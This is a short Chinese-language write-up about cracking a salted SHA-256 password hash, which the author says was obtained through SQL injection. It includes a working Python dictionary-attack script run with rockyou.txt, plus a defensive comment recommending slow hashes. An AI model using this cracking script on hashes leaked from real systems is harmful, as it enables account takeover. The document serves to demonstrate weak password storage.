密码爆破随笔
通过 SQL 注入,拿到了 salt 以及对应的 SHA-256 哈希值。由于可以看见自己可控账户的 SHA-256 值,对比之后我发现拼接方式是 salt+word 而不是 word+salt。于是决定用 rockyou.txt 字典爆破。居然成功了,我真的是maddog(这是密码)。可见只做一次加盐 SHA-256 的存储方式,在哈希和 salt 一起泄露之后挡不住字典攻击。
记录一下
import hashlib
import urllib.request
# Where the rockyou.txt wordlist is published and where it is expected on
# disk. Nothing below downloads it: the file must already be present.
rockyou_url = "https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt"
rockyou_path = "rockyou.txt"

# (SHA-256 hex digest, salt) pairs under test.
# Defender's note: a salt only defeats precomputed tables. Once the salt
# leaks together with the digest, a single fast SHA-256 round per guess is
# all that stands between a weak password and a wordlist. Password storage
# should use a deliberately slow hash (Argon2id, scrypt, bcrypt, or PBKDF2
# with a high iteration count).
passwords_and_salts = [
    ("d190456193ff5053e3fde4c1282df21beb88fcda3bf58c96eb993317b920fd07", "Q_A1lQO8Lkc"),
]

# Read every candidate into memory. Bytes that are not valid UTF-8 are
# dropped (errors="ignore") and surrounding whitespace is stripped per line.
common_passwords = []
with open(rockyou_path, mode="r", encoding="utf-8", errors="ignore") as wordlist:
    for raw_line in wordlist:
        common_passwords.append(raw_line.strip())

# Maps each matched digest to the plaintext that produced it.
cracked_passwords = {}

# Dictionary check: the stored digest is sha256(salt + password), salt first.
for hashed_password, salt in passwords_and_salts:
    for password in common_passwords:
        candidate = salt + password
        if hashlib.sha256(candidate.encode()).hexdigest() != hashed_password:
            continue
        cracked_passwords[hashed_password] = password
        print(f"Found password for {hashed_password}: {password}")
        break  # first match is enough for this digest

# Report the digests that no wordlist entry matched.
for hashed_password, _salt in passwords_and_salts:
    if hashed_password in cracked_passwords:
        continue
    print(f"Could not crack password for {hashed_password}")

